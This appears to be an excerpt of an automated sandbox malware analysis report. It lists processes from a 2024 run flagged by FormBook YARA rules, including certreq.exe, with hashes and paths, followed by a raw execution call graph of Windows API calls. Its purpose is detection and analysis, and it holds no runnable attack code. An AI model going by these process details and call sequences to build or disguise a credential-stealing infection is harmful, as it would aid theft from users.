                            Wow64 process (32bit):true
                            Commandline:"C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe"
                            Imagebase:0x100000
                            File size:140'800 bytes
                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3984522245.0000000005800000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.3984522245.0000000005800000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                            Reputation:high
                            Has exited:false

                            Target ID:4
                            Start time:06:19:46
                            Start date:27/05/2024
                            Path:C:\Windows\SysWOW64\certreq.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\SysWOW64\certreq.exe"
                            Imagebase:0xb60000
                            File size:439'296 bytes
                            MD5 hash:A18A70A77AAC4E9D59CFD65C969AF959
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3984304736.0000000003650000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3984304736.0000000003650000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3980970277.00000000033E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3980970277.00000000033E0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3977610628.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3977610628.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                            Reputation:low
                            Has exited:false

                            Target ID:6
                            Start time:06:20:01
                            Start date:27/05/2024
                            Path:C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe"
                            Imagebase:0x100000
                            File size:140'800 bytes
                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3987001681.0000000005650000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3987001681.0000000005650000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                            Reputation:high
                            Has exited:false

                            Target ID:8
                            Start time:06:20:14
                            Start date:27/05/2024
                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                            Imagebase:0x7ff722870000
                            File size:676'768 bytes
                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Reset < >

                              Execution Graph

                              Execution Coverage:4%
                              Dynamic/Decrypted Code Coverage:0.4%
                              Signature Coverage:2.5%
                              Total number of Nodes:2000
                              Total number of Limit Nodes:138
                              execution_graph 98080 fc107d 98085 fc71eb 98080->98085 98082 fc108c 98116 fe2f80 98082->98116 98086 fc71fb __ftell_nolock 98085->98086 98119 fc77c7 98086->98119 98090 fc72ba 98131 fe074f 98090->98131 98097 fc77c7 59 API calls 98098 fc72eb 98097->98098 98150 fc7eec 98098->98150 98100 fc72f4 RegOpenKeyExW 98101 ffecda RegQueryValueExW 98100->98101 98105 fc7316 Mailbox 98100->98105 98102 ffed6c RegCloseKey 98101->98102 98103 ffecf7 98101->98103 98102->98105 98115 ffed7e _wcscat Mailbox __wsetenvp 98102->98115 98154 fe0ff6 98103->98154 98105->98082 98106 ffed10 98164 fc538e 98106->98164 98109 ffed38 98167 fc7d2c 98109->98167 98110 fc7b52 59 API calls 98110->98115 98112 ffed52 98112->98102 98114 fc3f84 59 API calls 98114->98115 98115->98105 98115->98110 98115->98114 98176 fc7f41 98115->98176 98241 fe2e84 98116->98241 98118 fc1096 98120 fe0ff6 Mailbox 59 API calls 98119->98120 98121 fc77e8 98120->98121 98122 fe0ff6 Mailbox 59 API calls 98121->98122 98123 fc72b1 98122->98123 98124 fc4864 98123->98124 98180 ff1b90 98124->98180 98127 fc7f41 59 API calls 98128 fc4897 98127->98128 98182 fc48ae 98128->98182 98130 fc48a1 Mailbox 98130->98090 98132 ff1b90 __ftell_nolock 98131->98132 98133 fe075c GetFullPathNameW 98132->98133 98134 fe077e 98133->98134 98135 fc7d2c 59 API calls 98134->98135 98136 fc72c5 98135->98136 98137 fc7e0b 98136->98137 98138 fc7e1f 98137->98138 98139 fff173 98137->98139 98204 fc7db0 98138->98204 98209 fc8189 98139->98209 98142 fc72d3 98144 fc3f84 98142->98144 98143 fff17e __wsetenvp _memmove 98145 fc3f92 98144->98145 98149 fc3fb4 _memmove 98144->98149 98147 fe0ff6 Mailbox 59 API calls 98145->98147 98146 fe0ff6 Mailbox 59 API calls 98148 fc3fc8 98146->98148 98147->98149 98148->98097 98149->98146 98151 fc7f06 98150->98151 98153 fc7ef9 98150->98153 98152 fe0ff6 Mailbox 59 API calls 98151->98152 98152->98153 98153->98100 98156 fe0ffe 98154->98156 98157 fe1018 98156->98157 98159 fe101c std::exception::exception 98156->98159 98212 fe594c 98156->98212 98229 fe35e1 DecodePointer 98156->98229 98157->98106 98230 fe87db RaiseException 98159->98230 98161 fe1046 98231 fe8711 58 API calls _free 98161->98231 98163 fe1058 98163->98106 98165 fe0ff6 Mailbox 59 API calls 98164->98165 98166 fc53a0 RegQueryValueExW 98165->98166 98166->98109 98166->98112 98168 fc7d38 __wsetenvp 98167->98168 98169 fc7da5 98167->98169 98172 fc7d4e 98168->98172 98173 fc7d73 98168->98173 98170 fc7e8c 59 API calls 98169->98170 98171 fc7d56 _memmove 98170->98171 98171->98112 98240 fc8087 59 API calls Mailbox 98172->98240 98175 fc8189 59 API calls 98173->98175 98175->98171 98177 fc7f50 __wsetenvp _memmove 98176->98177 98178 fe0ff6 Mailbox 59 API calls 98177->98178 98179 fc7f8e 98178->98179 98179->98115 98181 fc4871 GetModuleFileNameW 98180->98181 98181->98127 98183 ff1b90 __ftell_nolock 98182->98183 98184 fc48bb GetFullPathNameW 98183->98184 98185 fc48da 98184->98185 98186 fc48f7 98184->98186 98187 fc7d2c 59 API calls 98185->98187 98188 fc7eec 59 API calls 98186->98188 98189 fc48e6 98187->98189 98188->98189 98192 fc7886 98189->98192 98193 fc7894 98192->98193 98196 fc7e8c 98193->98196 98195 fc48f2 98195->98130 98197 fc7ea3 _memmove 98196->98197 98198 fc7e9a 98196->98198 98197->98195 98198->98197 98200 fc7faf 98198->98200 98201 fc7fc2 98200->98201 98203 fc7fbf _memmove 98200->98203 98202 fe0ff6 Mailbox 59 API calls 98201->98202 98202->98203 98203->98197 98205 fc7dbf __wsetenvp 98204->98205 98206 fc8189 59 API calls 98205->98206 98207 fc7dd0 _memmove 98205->98207 98208 fff130 _memmove 98206->98208 98207->98142 98210 fe0ff6 Mailbox 59 API calls 98209->98210 98211 fc8193 98210->98211 98211->98143 98213 fe59c7 98212->98213 98220 fe5958 98212->98220 98238 fe35e1 DecodePointer 98213->98238 98215 fe59cd 98239 fe8d68 58 API calls __getptd_noexit 98215->98239 98218 fe598b RtlAllocateHeap 98218->98220 98228 fe59bf 98218->98228 98220->98218 98221 fe59b3 98220->98221 98225 fe59b1 98220->98225 98226 fe5963 98220->98226 98235 fe35e1 DecodePointer 98220->98235 98236 fe8d68 58 API calls __getptd_noexit 98221->98236 98237 fe8d68 58 API calls __getptd_noexit 98225->98237 98226->98220 98232 fea3ab 58 API calls 2 library calls 98226->98232 98233 fea408 58 API calls 8 library calls 98226->98233 98234 fe32df GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 98226->98234 98228->98156 98229->98156 98230->98161 98231->98163 98232->98226 98233->98226 98235->98220 98236->98225 98237->98228 98238->98215 98239->98228 98240->98171 98242 fe2e90 __close 98241->98242 98249 fe3457 98242->98249 98248 fe2eb7 __close 98248->98118 98266 fe9e4b 98249->98266 98251 fe2e99 98252 fe2ec8 DecodePointer DecodePointer 98251->98252 98253 fe2ea5 98252->98253 98254 fe2ef5 98252->98254 98263 fe2ec2 98253->98263 98254->98253 98312 fe89e4 59 API calls __close 98254->98312 98256 fe2f58 EncodePointer EncodePointer 98256->98253 98257 fe2f07 98257->98256 98259 fe2f2c 98257->98259 98313 fe8aa4 61 API calls 2 library calls 98257->98313 98259->98253 98261 fe2f46 EncodePointer 98259->98261 98314 fe8aa4 61 API calls 2 library calls 98259->98314 98261->98256 98262 fe2f40 98262->98253 98262->98261 98315 fe3460 98263->98315 98267 fe9e6f EnterCriticalSection 98266->98267 98268 fe9e5c 98266->98268 98267->98251 98273 fe9ed3 98268->98273 98270 fe9e62 98270->98267 98297 fe32f5 58 API calls 3 library calls 98270->98297 98274 fe9edf __close 98273->98274 98275 fe9ee8 98274->98275 98276 fe9f00 98274->98276 98298 fea3ab 58 API calls 2 library calls 98275->98298 98285 fe9f21 __close 98276->98285 98301 fe8a5d 58 API calls 2 library calls 98276->98301 98278 fe9eed 98299 fea408 58 API calls 8 library calls 98278->98299 98281 fe9f15 98283 fe9f1c 98281->98283 98284 fe9f2b 98281->98284 98282 fe9ef4 98300 fe32df GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 98282->98300 98302 fe8d68 58 API calls __getptd_noexit 98283->98302 98286 fe9e4b __lock 58 API calls 98284->98286 98285->98270 98289 fe9f32 98286->98289 98291 fe9f3f 98289->98291 98292 fe9f57 98289->98292 98303 fea06b InitializeCriticalSectionAndSpinCount 98291->98303 98304 fe2f95 98292->98304 98295 fe9f4b 98310 fe9f73 LeaveCriticalSection _doexit 98295->98310 98298->98278 98299->98282 98301->98281 98302->98285 98303->98295 98305 fe2f9e RtlFreeHeap 98304->98305 98306 fe2fc7 _free 98304->98306 98305->98306 98307 fe2fb3 98305->98307 98306->98295 98311 fe8d68 58 API calls __getptd_noexit 98307->98311 98309 fe2fb9 GetLastError 98309->98306 98310->98285 98311->98309 98312->98257 98313->98259 98314->98262 98318 fe9fb5 LeaveCriticalSection 98315->98318 98317 fe2ec7 98317->98248 98318->98317 98319 1000226 98325 fcade2 Mailbox 98319->98325 98321 1000c86 98436 10166f4 98321->98436 98323 1000c8f 98325->98321 98325->98323 98327 fcb6c1 98325->98327 98333 102d2e6 98325->98333 98380 103e237 98325->98380 98383 103474d 98325->98383 98392 fd2123 98325->98392 98432 fc9df0 59 API calls Mailbox 98325->98432 98433 fc8e34 59 API calls Mailbox 98325->98433 98434 1017405 59 API calls 98325->98434 98435 102a0b5 89 API calls 4 library calls 98327->98435 98334 102d310 98333->98334 98335 102d305 98333->98335 98337 102d3ea Mailbox 98334->98337 98340 fc77c7 59 API calls 98334->98340 98470 fc9c9c 98335->98470 98338 fe0ff6 Mailbox 59 API calls 98337->98338 98377 102d3f3 Mailbox 98337->98377 98339 102d433 98338->98339 98341 102d43f 98339->98341 98538 fc5906 60 API calls Mailbox 98339->98538 98342 102d334 98340->98342 98439 fc9997 98341->98439 98344 fc77c7 59 API calls 98342->98344 98346 102d33d 98344->98346 98348 fc9997 84 API calls 98346->98348 98350 102d349 98348->98350 98474 fc46f9 98350->98474 98353 102d46a GetLastError 98356 102d483 98353->98356 98354 102d49e 98358 102d500 98354->98358 98359 102d4c9 98354->98359 98355 102d35e 98525 fc7c8e 98355->98525 98356->98377 98539 fc5a1a CloseHandle 98356->98539 98361 fe0ff6 Mailbox 59 API calls 98358->98361 98362 fe0ff6 Mailbox 59 API calls 98359->98362 98365 102d505 98361->98365 98366 102d4ce 98362->98366 98363 102d3e3 98368 fc9c9c 59 API calls 98363->98368 98372 fc77c7 59 API calls 98365->98372 98365->98377 98370 102d4df 98366->98370 98373 fc77c7 59 API calls 98366->98373 98368->98337 98540 102f835 59 API calls 2 library calls 98370->98540 98371 102d3a5 98374 fc7f41 59 API calls 98371->98374 98372->98377 98373->98370 98376 102d3b2 98374->98376 98537 1023c66 63 API calls Mailbox 98376->98537 98377->98325 98379 102d3bb Mailbox 98379->98363 98631 103cdf1 98380->98631 98382 103e247 98382->98325 98384 fc9997 84 API calls 98383->98384 98385 1034787 98384->98385 98742 fc63a0 98385->98742 98387 10347bc 98391 10347c0 98387->98391 98790 fc9bf8 98387->98790 98388 1034797 98388->98387 98767 fca000 98388->98767 98391->98325 98393 fc9bf8 59 API calls 98392->98393 98394 fd213b 98393->98394 98396 fe0ff6 Mailbox 59 API calls 98394->98396 98399 10069af 98394->98399 98397 fd2154 98396->98397 98400 fd2164 98397->98400 98837 fc5906 60 API calls Mailbox 98397->98837 98398 fd2189 98403 fc9c9c 59 API calls 98398->98403 98407 fd2196 98398->98407 98399->98398 98841 102f7df 59 API calls 98399->98841 98402 fc9997 84 API calls 98400->98402 98404 fd2172 98402->98404 98405 10069f7 98403->98405 98406 fc5956 67 API calls 98404->98406 98405->98407 98408 10069ff 98405->98408 98409 fd2181 98406->98409 98410 fc5e3f 2 API calls 98407->98410 98411 fc9c9c 59 API calls 98408->98411 98409->98398 98409->98399 98840 fc5a1a CloseHandle 98409->98840 98413 fd219d 98410->98413 98411->98413 98414 1006a11 98413->98414 98415 fd21b7 98413->98415 98417 fe0ff6 Mailbox 59 API calls 98414->98417 98416 fc77c7 59 API calls 98415->98416 98418 fd21bf 98416->98418 98419 1006a17 98417->98419 98822 fc56d2 98418->98822 98421 1006a2b 98419->98421 98842 fc59b0 ReadFile SetFilePointerEx 98419->98842 98426 1006a2f _memmove 98421->98426 98843 102794e 59 API calls 2 library calls 98421->98843 98424 fd21ce 98424->98426 98838 fc9b9c 59 API calls Mailbox 98424->98838 98427 fd21e2 Mailbox 98428 fd221c 98427->98428 98429 fc5dcf CloseHandle 98427->98429 98428->98325 98430 fd2210 98429->98430 98430->98428 98839 fc5a1a CloseHandle 98430->98839 98432->98325 98433->98325 98434->98325 98435->98321 98881 1016636 98436->98881 98438 1016702 98438->98323 98440 fc99ab 98439->98440 98441 fc99b1 98439->98441 98457 fc5956 98440->98457 98442 fff9fc __i64tow 98441->98442 98443 fc99f9 98441->98443 98445 fc99b7 __itow 98441->98445 98448 fff903 98441->98448 98541 fe38d8 83 API calls 3 library calls 98443->98541 98447 fe0ff6 Mailbox 59 API calls 98445->98447 98449 fc99d1 98447->98449 98450 fe0ff6 Mailbox 59 API calls 98448->98450 98455 fff97b Mailbox _wcscpy 98448->98455 98449->98440 98451 fc7f41 59 API calls 98449->98451 98453 fff948 98450->98453 98451->98440 98452 fe0ff6 Mailbox 59 API calls 98454 fff96e 98452->98454 98453->98452 98454->98455 98456 fc7f41 59 API calls 98454->98456 98542 fe38d8 83 API calls 3 library calls 98455->98542 98456->98455 98543 fc5dcf 98457->98543 98461 fc5981 98462 fc59a4 98461->98462 98555 fc5770 98461->98555 98462->98353 98462->98354 98464 fc5993 98572 fc53db SetFilePointerEx SetFilePointerEx 98464->98572 98466 fc599a 98466->98462 98467 ffe030 98466->98467 98573 1023696 SetFilePointerEx SetFilePointerEx WriteFile 98467->98573 98469 ffe060 98469->98462 98471 fc9cad 98470->98471 98472 fc9cb2 98470->98472 98471->98472 98596 fe37ca 59 API calls 98471->98596 98472->98334 98475 fc77c7 59 API calls 98474->98475 98476 fc470f 98475->98476 98477 fc77c7 59 API calls 98476->98477 98478 fc4717 98477->98478 98479 fc77c7 59 API calls 98478->98479 98480 fc471f 98479->98480 98481 fc77c7 59 API calls 98480->98481 98482 fc4727 98481->98482 98483 ffd8fb 98482->98483 98484 fc475b 98482->98484 98485 fc81a7 59 API calls 98483->98485 98486 fc79ab 59 API calls 98484->98486 98487 ffd904 98485->98487 98488 fc4769 98486->98488 98489 fc7eec 59 API calls 98487->98489 98490 fc7e8c 59 API calls 98488->98490 98493 fc479e 98489->98493 98491 fc4773 98490->98491 98491->98493 98494 fc79ab 59 API calls 98491->98494 98492 fc47de 98597 fc79ab 98492->98597 98493->98492 98496 fc47bd 98493->98496 98505 ffd924 98493->98505 98497 fc4794 98494->98497 98610 fc7b52 98496->98610 98501 fc7e8c 59 API calls 98497->98501 98499 fc47ef 98504 fc4801 98499->98504 98613 fc81a7 98499->98613 98500 ffd9f4 98502 fc7d2c 59 API calls 98500->98502 98501->98493 98524 ffd9b1 98502->98524 98507 fc4811 98504->98507 98508 fc81a7 59 API calls 98504->98508 98505->98500 98513 ffd9dd 98505->98513 98521 ffd95b 98505->98521 98509 fc4818 98507->98509 98511 fc81a7 59 API calls 98507->98511 98508->98507 98512 fc81a7 59 API calls 98509->98512 98520 fc481f Mailbox 98509->98520 98510 fc79ab 59 API calls 98510->98492 98511->98509 98512->98520 98513->98500 98515 ffd9c8 98513->98515 98514 ffd9b9 98516 fc7d2c 59 API calls 98514->98516 98517 fc7d2c 59 API calls 98515->98517 98516->98524 98517->98524 98518 fc7b52 59 API calls 98518->98524 98520->98355 98521->98514 98522 ffd9a4 98521->98522 98523 fc7d2c 59 API calls 98522->98523 98523->98524 98524->98492 98524->98518 98617 fc7a84 59 API calls 2 library calls 98524->98617 98526 fff094 98525->98526 98527 fc7ca0 98525->98527 98626 1018123 59 API calls _memmove 98526->98626 98620 fc7bb1 98527->98620 98530 fc7cac 98530->98363 98534 1023e73 98530->98534 98531 fff09e 98532 fc81a7 59 API calls 98531->98532 98533 fff0a6 Mailbox 98532->98533 98627 1024696 GetFileAttributesW 98534->98627 98537->98379 98538->98341 98539->98377 98540->98377 98541->98445 98542->98442 98544 fc5de8 98543->98544 98545 fc5962 98543->98545 98544->98545 98546 fc5ded CloseHandle 98544->98546 98547 fc5df9 98545->98547 98546->98545 98548 ffe181 98547->98548 98549 fc5e12 CreateFileW 98547->98549 98550 fc5e34 98548->98550 98551 ffe187 CreateFileW 98548->98551 98549->98550 98550->98461 98551->98550 98552 ffe1ad 98551->98552 98574 fc5c4e 98552->98574 98556 ffdfce 98555->98556 98557 fc578b 98555->98557 98571 fc581a 98556->98571 98590 fc5e3f 98556->98590 98558 fc5c4e 2 API calls 98557->98558 98557->98571 98559 fc57ad 98558->98559 98560 fc538e 59 API calls 98559->98560 98562 fc57b7 98560->98562 98562->98556 98563 fc57c4 98562->98563 98564 fe0ff6 Mailbox 59 API calls 98563->98564 98565 fc57cf 98564->98565 98566 fc538e 59 API calls 98565->98566 98567 fc57da 98566->98567 98584 fc5d20 98567->98584 98570 fc5c4e 2 API calls 98570->98571 98571->98464 98572->98466 98573->98469 98580 fc5c68 98574->98580 98575 fc5cef SetFilePointerEx 98582 fc5dae SetFilePointerEx 98575->98582 98576 ffe151 98583 fc5dae SetFilePointerEx 98576->98583 98579 ffe16b 98580->98575 98580->98576 98581 fc5cc3 98580->98581 98581->98550 98582->98581 98583->98579 98585 fc5d2e 98584->98585 98586 fc5d93 98584->98586 98587 fc5807 98585->98587 98589 fc5d66 ReadFile 98585->98589 98595 fc5dae SetFilePointerEx 98586->98595 98587->98570 98589->98585 98589->98587 98591 fc5c4e 2 API calls 98590->98591 98592 fc5e60 98591->98592 98593 fc5c4e 2 API calls 98592->98593 98594 fc5e74 98593->98594 98594->98571 98595->98585 98596->98472 98598 fc79ba 98597->98598 98599 fc7a17 98597->98599 98598->98599 98600 fc79c5 98598->98600 98601 fc7e8c 59 API calls 98599->98601 98602 fc79e0 98600->98602 98603 ffef32 98600->98603 98607 fc79e8 _memmove 98601->98607 98618 fc8087 59 API calls Mailbox 98602->98618 98604 fc8189 59 API calls 98603->98604 98606 ffef3c 98604->98606 98608 fe0ff6 Mailbox 59 API calls 98606->98608 98607->98499 98609 ffef5c 98608->98609 98611 fc7faf 59 API calls 98610->98611 98612 fc47c7 98611->98612 98612->98492 98612->98510 98614 fc81ba 98613->98614 98615 fc81b2 98613->98615 98614->98504 98619 fc80d7 59 API calls 2 library calls 98615->98619 98617->98524 98618->98607 98619->98614 98621 fc7bbf 98620->98621 98625 fc7be5 _memmove 98620->98625 98622 fe0ff6 Mailbox 59 API calls 98621->98622 98621->98625 98623 fc7c34 98622->98623 98624 fe0ff6 Mailbox 59 API calls 98623->98624 98624->98625 98625->98530 98626->98531 98628 1023e7a 98627->98628 98629 10246b1 FindFirstFileW 98627->98629 98628->98363 98628->98371 98629->98628 98630 10246c6 FindClose 98629->98630 98630->98628 98632 fc9997 84 API calls 98631->98632 98633 103ce2e 98632->98633 98652 103ce75 Mailbox 98633->98652 98669 103dab9 98633->98669 98635 103d0cd 98636 103d242 98635->98636 98640 103d0db 98635->98640 98719 103dbdc 92 API calls Mailbox 98636->98719 98639 103d251 98639->98640 98642 103d25d 98639->98642 98682 103cc82 98640->98682 98641 fc9997 84 API calls 98657 103cec6 Mailbox 98641->98657 98642->98652 98647 103d114 98697 fe0e48 98647->98697 98650 103d147 98704 fc942e 98650->98704 98651 103d12e 98703 102a0b5 89 API calls 4 library calls 98651->98703 98652->98382 98656 103d139 GetCurrentProcess TerminateProcess 98656->98650 98657->98635 98657->98641 98657->98652 98701 102f835 59 API calls 2 library calls 98657->98701 98702 103d2f3 61 API calls 2 library calls 98657->98702 98661 103d2b8 98661->98652 98665 103d2cc FreeLibrary 98661->98665 98662 103d17f 98716 103d95d 107 API calls _free 98662->98716 98665->98652 98668 103d190 98668->98661 98717 fc8ea0 59 API calls Mailbox 98668->98717 98718 fc9e9c 60 API calls Mailbox 98668->98718 98720 103d95d 107 API calls _free 98668->98720 98670 fc7faf 59 API calls 98669->98670 98671 103dad4 CharLowerBuffW 98670->98671 98721 101f658 98671->98721 98675 fc77c7 59 API calls 98676 103db0d 98675->98676 98677 fc79ab 59 API calls 98676->98677 98679 103db24 98677->98679 98678 103db6c Mailbox 98678->98657 98680 fc7e8c 59 API calls 98679->98680 98681 103db30 Mailbox 98680->98681 98681->98678 98728 103d2f3 61 API calls 2 library calls 98681->98728 98683 103cc9d 98682->98683 98687 103ccf2 98682->98687 98684 fe0ff6 Mailbox 59 API calls 98683->98684 98686 103ccbf 98684->98686 98685 fe0ff6 Mailbox 59 API calls 98685->98686 98686->98685 98686->98687 98688 103dd64 98687->98688 98689 103df8d Mailbox 98688->98689 98696 103dd87 _strcat _wcscpy __wsetenvp 98688->98696 98689->98647 98690 fc9cf8 59 API calls 98690->98696 98691 fc9d46 59 API calls 98691->98696 98692 fc9c9c 59 API calls 98692->98696 98693 fc9997 84 API calls 98693->98696 98694 fe594c 58 API calls __crtGetStringTypeA_stat 98694->98696 98696->98689 98696->98690 98696->98691 98696->98692 98696->98693 98696->98694 98731 1025b29 61 API calls 2 library calls 98696->98731 98698 fe0e5d 98697->98698 98699 fe0ef5 VirtualAlloc 98698->98699 98700 fe0ec3 98698->98700 98699->98700 98700->98650 98700->98651 98701->98657 98702->98657 98703->98656 98705 fc9436 98704->98705 98706 fe0ff6 Mailbox 59 API calls 98705->98706 98707 fc9444 98706->98707 98708 fc9450 98707->98708 98732 fc935c 59 API calls Mailbox 98707->98732 98710 fc91b0 98708->98710 98733 fc92c0 98710->98733 98712 fc91bf 98713 fe0ff6 Mailbox 59 API calls 98712->98713 98714 fc925b 98712->98714 98713->98714 98714->98668 98715 fc8ea0 59 API calls Mailbox 98714->98715 98715->98662 98716->98668 98717->98668 98718->98668 98719->98639 98720->98668 98723 101f683 __wsetenvp 98721->98723 98722 101f6c2 98722->98675 98722->98681 98723->98722 98724 101f769 98723->98724 98725 101f6b8 98723->98725 98724->98722 98730 fc7a24 61 API calls 98724->98730 98725->98722 98729 fc7a24 61 API calls 98725->98729 98728->98678 98729->98725 98730->98724 98731->98696 98732->98708 98734 fc92c9 Mailbox 98733->98734 98735 fff5c8 98734->98735 98740 fc92d3 98734->98740 98736 fe0ff6 Mailbox 59 API calls 98735->98736 98738 fff5d4 98736->98738 98737 fc92da 98737->98712 98740->98737 98741 fc9df0 59 API calls Mailbox 98740->98741 98741->98740 98803 fc7b76 98742->98803 98744 fc65ca 98810 fc766f 59 API calls 2 library calls 98744->98810 98746 fc65e4 Mailbox 98746->98388 98749 ffe41f 98813 101fdba 91 API calls 4 library calls 98749->98813 98750 fc766f 59 API calls 98762 fc63c5 98750->98762 98754 ffe42d 98814 fc766f 59 API calls 2 library calls 98754->98814 98755 fc7eec 59 API calls 98755->98762 98757 ffe443 98757->98746 98758 fc68f9 _memmove 98815 101fdba 91 API calls 4 library calls 98758->98815 98759 ffe3bb 98760 fc8189 59 API calls 98759->98760 98761 ffe3c6 98760->98761 98766 fe0ff6 Mailbox 59 API calls 98761->98766 98762->98744 98762->98749 98762->98750 98762->98755 98762->98758 98762->98759 98764 fc7faf 59 API calls 98762->98764 98808 fc60cc 60 API calls 98762->98808 98809 fc5ea1 59 API calls Mailbox 98762->98809 98811 fc5fd2 60 API calls 98762->98811 98812 fc7a84 59 API calls 2 library calls 98762->98812 98765 fc659b CharUpperBuffW 98764->98765 98765->98762 98766->98758 98768 fca01f 98767->98768 98782 fca04d Mailbox 98767->98782 98769 fe0ff6 Mailbox 59 API calls 98768->98769 98769->98782 98770 fe2f80 67 API calls __cinit 98770->98782 98771 fcb5d5 98772 fc81a7 59 API calls 98771->98772 98785 fca1b7 98772->98785 98773 fc77c7 59 API calls 98773->98782 98776 fe0ff6 59 API calls Mailbox 98776->98782 98778 100047f 98818 102a0b5 89 API calls 4 library calls 98778->98818 98780 fc81a7 59 API calls 98780->98782 98782->98770 98782->98771 98782->98773 98782->98776 98782->98778 98782->98780 98783 1017405 59 API calls 98782->98783 98782->98785 98786 1000e00 98782->98786 98788 fcb5da 98782->98788 98789 fca6ba 98782->98789 98816 fcca20 341 API calls 2 library calls 98782->98816 98817 fcba60 60 API calls Mailbox 98782->98817 98783->98782 98784 100048e 98784->98387 98785->98387 98820 102a0b5 89 API calls 4 library calls 98786->98820 98821 102a0b5 89 API calls 4 library calls 98788->98821 98819 102a0b5 89 API calls 4 library calls 98789->98819 98791 fffbff 98790->98791 98792 fc9c08 98790->98792 98793 fffc10 98791->98793 98794 fc7d2c 59 API calls 98791->98794 98796 fe0ff6 Mailbox 59 API calls 98792->98796 98795 fc7eec 59 API calls 98793->98795 98794->98793 98797 fffc1a 98795->98797 98798 fc9c1b 98796->98798 98800 fc9c34 98797->98800 98801 fc77c7 59 API calls 98797->98801 98798->98797 98799 fc9c26 98798->98799 98799->98800 98802 fc7f41 59 API calls 98799->98802 98800->98391 98801->98800 98802->98800 98804 fe0ff6 Mailbox 59 API calls 98803->98804 98805 fc7b9b 98804->98805 98806 fc8189 59 API calls 98805->98806 98807 fc7baa 98806->98807 98807->98762 98808->98762 98809->98762 98810->98746 98811->98762 98812->98762 98813->98754 98814->98757 98815->98746 98816->98782 98817->98782 98818->98784 98819->98785 98820->98788 98821->98785 98823 fc56dd 98822->98823 98824 fc5702 98822->98824 98823->98824 98828 fc56ec 98823->98828 98825 fc7eec 59 API calls 98824->98825 98826 102349a 98825->98826 98830 10234c9 98826->98830 98844 1023436 ReadFile SetFilePointerEx 98826->98844 98845 fc7a84 59 API calls 2 library calls 98826->98845 98846 fc5c18 98828->98846 98830->98424 98836 10235d8 Mailbox 98836->98424 98837->98400 98838->98427 98839->98428 98840->98399 98841->98399 98842->98421 98843->98426 98844->98826 98845->98826 98847 fe0ff6 Mailbox 59 API calls 98846->98847 98848 fc5c2b 98847->98848 98849 fe0ff6 Mailbox 59 API calls 98848->98849 98850 fc5c37 98849->98850 98851 fc5632 98850->98851 98858 fc5a2f 98851->98858 98853 fc5674 98853->98836 98857 fc793a 61 API calls Mailbox 98853->98857 98854 fc5d20 2 API calls 98855 fc5643 98854->98855 98855->98853 98855->98854 98865 fc5bda 98855->98865 98857->98836 98859 ffe065 98858->98859 98860 fc5a40 98858->98860 98874 1016443 59 API calls Mailbox 98859->98874 98860->98855 98862 ffe06f 98863 fe0ff6 Mailbox 59 API calls 98862->98863 98864 ffe07b 98863->98864 98866 fc5bee 98865->98866 98867 ffe117 98865->98867 98875 fc5b19 98866->98875 98880 1016443 59 API calls Mailbox 98867->98880 98870 fc5bfa 98870->98855 98871 ffe122 98872 fe0ff6 Mailbox 59 API calls 98871->98872 98873 ffe137 _memmove 98872->98873 98874->98862 98876 fc5b31 98875->98876 98879 fc5b2a _memmove 98875->98879 98877 fe0ff6 Mailbox 59 API calls 98876->98877 98878 ffe0a7 98876->98878 98877->98879 98879->98870 98880->98871 98882 101665e 98881->98882 98883 1016641 98881->98883 98882->98438 98883->98882 98885 1016621 59 API calls Mailbox 98883->98885 98885->98883 98886 fc1055 98891 fc2649 98886->98891 98889 fe2f80 __cinit 67 API calls 98890 fc1064 98889->98890 98892 fc77c7 